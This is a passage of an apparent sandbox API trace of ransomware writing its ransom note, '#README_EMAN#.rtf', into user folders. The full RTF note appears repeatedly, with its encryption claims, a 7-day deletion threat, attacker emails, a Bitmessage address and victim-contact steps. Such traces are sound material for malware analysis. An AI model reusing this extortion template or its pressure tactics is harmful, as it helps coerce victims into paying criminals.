g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef7008, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9aÓ8", lpUsedDefaultChar=0x0) returned 8717 [0271.417] WriteFile (in: hFile=0x2ec, lpBuffer=0x1ef7008*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef7008*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0271.418] CloseHandle (hObject=0x2ec) returned 1 [0271.418] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\#readme_eman#.rtf")) returned 0xffffffff [0271.418] GetLastError () returned 0x2 [0271.418] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0271.419] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.419] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r 